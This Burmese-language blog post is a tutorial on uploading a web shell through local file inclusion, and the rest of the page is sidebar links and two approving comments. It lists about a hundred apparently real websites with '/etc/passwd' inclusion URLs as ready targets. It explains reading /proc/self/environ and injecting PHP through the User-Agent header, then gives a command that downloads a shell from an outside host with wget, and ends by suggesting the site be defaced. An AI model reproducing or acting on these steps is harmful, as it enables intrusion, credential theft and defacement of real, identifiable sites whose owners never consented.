Local File Inclusion Vulnerability ကို အသံုးခ်ျပီး Shell upload လုပ္ဖို ့အတြက္ common parameter အခ်ိဳ ့ကို သိထားဖို ့လိုအပ္ပါတယ္။
index.php?homepage=
index.php?page=
index.php?index2=
LFI နဲ ့ Shell upload လုပ္ဖို ့အတြက္ လိုအပ္တာေတြကေတာ့
၁။ Vulnerable Website
၂။ Shell
၃။ User-Agent Switcher ( Download )
၄။ Mozilla FireFox
ကြ်န္ေတာ့္ဆီမွာ ရွိေနတဲ vulnerable site ေတြကေတာ့
http://kyengerarotaryclub.org/index.php?page=/etc/passwd http://www.crsfsite.net/main/index.php?page=/etc/passwd http://modelspromo.com/index.php?page=/etc/passwd http://www.mrt.ac.lk/gavel/index.php?page=/etc/passwd http://nyctradeprinting.com/index.php?page=/etc/passwd http://www.dayborodistrict.com.au/index.php?page=/etc/passwd http://schumpeter2011.econ.tuwien.ac.at/index.php?page=/etc/passwd http://www.alinholding.com/index.php?page=/etc/passwd&page_title=home http://diuf.unifr.ch/pai/education/2006_2007/ca/index.php?page=/etc/passwd&subpage=/etc/passwd http://lyantndc.cluster010.ovh.net/index.php?page=/etc/passwd http://mspierphoto.com/index.php?page=/etc/passwd http://www.tottenfarms.com/index.php?site=1&page=/etc/passwd http://www.sohnidharti.tv/main/Urdu/index.php?page=/etc/passwd http://www.crsfsite.net/main/index.php?page=/etc/passwd http://www.expo-ingenieurs.be/index.php?lang=FR&page=/etc/passwd http://www.lovium.nl/index.php?page=/etc/passwd http://www.death-star.net/index.php?Page=/etc/passwd http://www.f-a-t.de/fat_v1/index.php?lang_id=2&page=/etc/passwd http://www.jpistudios.com/redirect.php?page=../../../../../../etc/passwd http://x17agency.com/redirect.php?page=../../../../../etc/passwd http://www.winnerspizza.com/index.php?page=/etc/passwd http://oregon-airsoft.com/index.php?page=/etc/passwd http://www.eyesonmain.ca/index.php?page=/etc/passwd http://www.tottenfarms.com/index.php?page=/etc/passwd http://www.rtscom.com/index.php?page=/etc/passwd http://www.lavieillefrance.fr/index.php?page=/etc/passwd http://www.evoca.ch/index.php?page=../etc/passwd http://estaminetlille.fr/vieille/index.php?page=/etc/passwd http://www.traildumont.be/index.php?page=/etc/passwd&album=12 http://www.speakingfromtheheartinc.com/index.php?page=/etc/passwd http://www.moto-plus.net/index.php?Page=../../../../../etc/passwd http://www.maxparts.ru/index.php?page=/etc/passwd http://www.focusfloors.co.za/?page=../../../../etc/passwd http://www.bushboats.co.za/index.php?page=../../../../etc/passwd http://www.creteform.com/index.php?page=/etc/passwd&PHPSESSID=null http://www.dreisingerfuneralhome.com/index.php?page=../../../../../etc/passwd http://www.iceclub.biz/index.php?page=../../../../etc/passwd http://www.daybororuralfire.com.au/index.php?page=/etc/passwd http://www.spcstamps.com/index.php?page=/etc/passwd&back=null http://www.ninaal.pl/index.php?page=../etc/passwd http://www.tempelwelt.de/index.php?page=../../../../etc/passwd&PHPSESSID=null http://www.mescreations.fr/index.php?page=../../../../etc/passwd http://www.death-star.net/index.php?Page=/etc/passwd&Mode=MDP http://www.scoberbernbach.de/index.php?page=/etc/passwd http://lomejordehuelva.com/index.php?page=/etc/passwd http://pomestam24.ru/index.php?page=/etc/passwd&option=login http://www.kaltimmethanol.com/indo/index.php?page=/etc/passwd http://winnerspizza.com/index.php?page=/etc/passwd http://timslist.com/utechtube/index.php?page=/etc/passwd http://www.fuw.edu.pl/~trawinski/index.php?page=/etc/passwd http://www.memorial-odlozil.cz/odlozil/index.php?page=/etc/passwd http://maxponomarenko.ru/index.php?page=/etc/passwd http://shotgun.cc/index.php?page=/etc/passwd http://www.fair-wohnen.de/index.php?page=../../../../../../etc/passwd http://jhcs.eu/index.php?folder=Kontakt&page=../../../../../etc/passwd http://www.rheuma-liga.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt http://www.hamann-lege.de/index.php?page=/etc/passwd http://www.ulmer-verein.de/uv/index.php?page=/etc/passwd http://proimmo360.com/index.php?page=/etc/passwd http://www.lelo.biz/index.php?name=Kontakt&page=/etc/passwd&items=4 http://www.misbrugscenterherning.dk/index.php?page=../../../../../etc/passwd http://www.wti-juelich.de/index.php?page=/etc/passwd http://www.sekoro.seko-bayern.org/index.php?page=/etc/passwd http://www.immobilieninvest.at/index.php?page=/etc/passwd&PHPSESSID=null http://www.lc-bensberg-schloss.de/index.php?page=../../../../../../../../etc/passwd http://www.ingolstadt.muetterzentren-bayern.de/index.php?page=/etc/passwd http://www.tendokarate.no/index.php?page=/etc/passwd http://www.mstechnical.pl/de/index.php?page=/etc/passwd http://www.k-turm.de/index.php?page=/etc/passwd http://wsc-skiextreme.wir-und-ich.de/index.php?page=../../../etc/passwd http://www.seniorenbueros-bayern.de/index.php?page=/etc/passwd&titel=Kontakt http://www.bodyworld-schkeuditz.de/index.php?page=/etc/passwd http://www.fortschrittwuerzburg.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt http://www.spielmannszug-ffw-oberkotzau.de/index.php?page=/etc/passwd http://proimmo360.com/index.php?page=/etc/passwd http://www.grabowscy.com/index.php?page=/etc/passwd http://www.heilpraxis-geissdoerfer.de/index.php?page=/etc/passwd http://www.selfclean.de/index.php?page=/etc/passwd http://www.ninaal.pl/index.php?page=../etc/passwd http://www.cncmodel.pl/eng/index.php?page=/etc/passwd http://walk-in-the-park.de/index.php?page=/etc/passwd http://www.k-tower.eu/index.php?page=/etc/passwd http://dorfschuetzen.de.dedi926.your-server.de/index.php?page=/etc/passwd&PHPSESSID=null http://www.ma2da.de/index.php?page=/etc/passwd http://www.frauentreff-welden.de/index.php?page=/etc/passwd http://etechnik-wichmann.de/index.php?page=../../../../etc/passwd http://www.erotik-als-lebenskraft.de/index.php?page=/etc/passwd http://84388.webhosting28.1blu.de/huchbaumanagement/index.php?page=/etc/passwd http://www.stotterer-selbsthilfe-regensburg.seko-bayern.org/index.php?page=/etc/passwd http://www.muezeger.de/index.php?page=/etc/passwd http://schlafapnoe.selbsthilfe-wue.de/index.php?page=/etc/passwd http://www.hctjstbk.cz/index.php?page=/etc/passwd http://violetta-tradgard.se/index.php?page=/etc/passwd http://www.sdhpardubice.cz/index.php?page=/etc/passwd http://www.osteoporose.selbsthilfe-wue.de/index.php?page=/etc/passwd http://www.die-drid.de/index.php?mod=kontaktmenu.php&page=/etc/passwd
ပထမဆံုးအေနနဲ ့LFI Vulnerable ရွိေနတဲ့ site ( အေပၚက List ထဲပါတဲ့ site ေတြတင္မကပါဘူး မိမိ ကိုယ္တိုင္ရွာေတြ ့ထားတဲ ့ site ေတြလည္း အသံုးျပဳလို ့ရပါတယ္ root access ရထားဖို ့ေတာ့လိုအပ္ပါတယ္ )
ရဲ ့ေနာက္မွာ /etc/passwd ဆိုတာကို ရိုက္ထည့္လိုက္ပါ။
ဒါဆိုရင္ေတာ့ root access ရေအာင္ လုပ္ဖို ့အတြက္ username & password ကို ေတာ့ရျပီ
Password ကို ဘယ္လို hash ျဖည္ရမယ္ root access ရေအာင္ ဘယ္လုိ လုပ္ရမလဲဆိုတာေတာ့ ကြ်န္ေတာ္ tutorial သပ္သပ္ ေရးခဲ့ျပီးျပီ လိုအပ္ရင္ ရွာဖတ္လိုက္ပါ။
ေနာက္တဆင့္အေနနဲ ့ path ကို /proc/self/environ ဆိုတာကို ေျပာင္းလိုက္ပါ။ ကြ်န္ေတာ္ ဥပမာေပးထားတဲ့ site အရဆို ေအာက္ကပံုအတိုင္းျဖစ္လိမ့္မယ္။
အဲ့လို အထက္ကအတုိင္း /etc/passwd နဲ ့ /proc/self/environ ကို စစ္ၾကည့္လို ့ok တယ္ဆုိရင္ေတာ့
remote code execution လုပ္ဖို ့အတြက္ User-Agent Switcher ဆိုတဲ့ extension ကို အသံုးျပဳရပါမယ္။
User Agent ကို edit လုပ္ဖုိ ့နဲ ့ code ေတြ ေျပာင္းဖို ့အတြက္
ေအာက္မွာေဖာ္ျပထားတဲ ့ပံုေတြထဲကအတိုင္း step by step ျပဳလုပ္ေပးရမွာျဖစ္ပါတယ္။
အားလံုးျပီးသြားရင္ေတာ့ website ကို refresh လုပ္ျပီးေတာ့ Ctrl+F ကို ႏွိပ္ျပီး
"disable_functions" ဆိုတာကို search လုပ္ပါ။
ဒါဆိုရင္ေတာ့ Shell တင္ဖို ့ ready ျဖစ္ေနပါျပီdisable_functions | no value | no value
ေအာက္က command ကို သံုးျပီး shell upload လုပ္လို ့ရပါတယ္။
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>
upload လုပ္ျပီး .php ဆိုျပီး နာမည္တစ္ခုနဲ ့ rename ျပန္လုပ္ဖို ့လိုပါတယ္။
shell ကို upload လုပ္ျပီးသြားရင္ေတာ့ ေအာက္က ပံုအတိုင္း ျမင္ေတြ ့ရမွာျဖစ္ပါတယ္။
ဒါဆိုရင္ေတာ့ သင့္လက္ထဲ အဲ့ ဒီ site ေရာက္သြားပါျပီ။
index.php ကို ျပင္ျပီးေတာ့ သင့္ deface code ကို ထည့္ဖို ့အဆင္သင့္ပါပဲ။
(မွတ္ခ်က္။ ။ ကြ်န္ေတာ္သည္ black hat တစ္ေယာက္မဟုတ္သလို white hat တစ္ေယာက္လည္း မဟုတ္ပါဘူး အရွင္းဆံုးေျပာရရင္ "I am not Hacker, but i love Hacking".)
Do you like this article? Share It!
2 comments to "Shell Upload using LFI method"
Post a Comment
သင့္ရဲ ့ comment မ်ားက ကြ်န္ေတာ္တို႔လို blogger ေတြ အတြက္ အားေဆးတစ္ခြက္ပါ။
ေကာင္းသည္၊ ဆုိးသည္ ေရးႏုိင္ပါသည္။ လိုအပ္သည္မ်ားကိုလည္းေဝဖန္အၾကံေပးႏုိင္ပါသည္။
About This Blog
Popular Posts
-
ဒီတစ္ခါေတာ့ wireless network ရဲ ့ security ပိုင္းနဲ ့ပတ္သတ္ျပီး က်ေနာ္ တီးမိေခါက္မိ သေလာက္ေလး ကို share ေပးတဲ့သေဘာပါ။ Wireless Network ဆ... -
Pentesters သို ့မဟုတ္ Hacker အမ်ားစုဟာ သူတို ့အတြက္ အသံုး၀င္တဲ့ plugin ေတာ္ေတာ္မ်ားမ်ား အသံုးျပဳ လို ့ရတဲ့ Mozilla Firefox Browser ကိ... -
ဒီပိုစ့္မွာေတာ့ facebook က fixed ျပန္လုပ္ျပီးသား bug တစ္ခု အေၾကာင္းကို တင္ျပေပးသြားမွာျဖစ္ပါတယ္ ဒီ bug ကို ရွာေတြ ့ခဲ့တဲ ့ Fin1te ဆိုတဲ့ င...
-
Root ဆိုတာဘာလဲ Root ဆိုတာ အၾကမ္းဖ်င္းအားျဖင့္ Server တစ္ခုရဲ ့Administrator ျဖစ္ေအာင္လုပ္လုိက္တာပါပဲ။ တကယ္လို ့ သင္သာ server တစ္... -
Introduction to Firewall ကြ်န္ေတာ္တို ့ေက်ာင္းေတြမွာ ဒါမွမဟုတ္ ရံုးခန္းေတြမွာ အင္တာနက္ အသံုးျပဳတဲ့အခါမွာ အခ်ိဳ ့ website (အထူးသျဖင္ ့ s...
newbie says:
nice tut :D great bro!! pls keep...........
Anonymous says:
ေဟ႕ ေရာင္ ရူွပ္လို႕ Perl script နဲ႕ တင္ကြာ..1337 မွာ ၇ွိတယ္ source code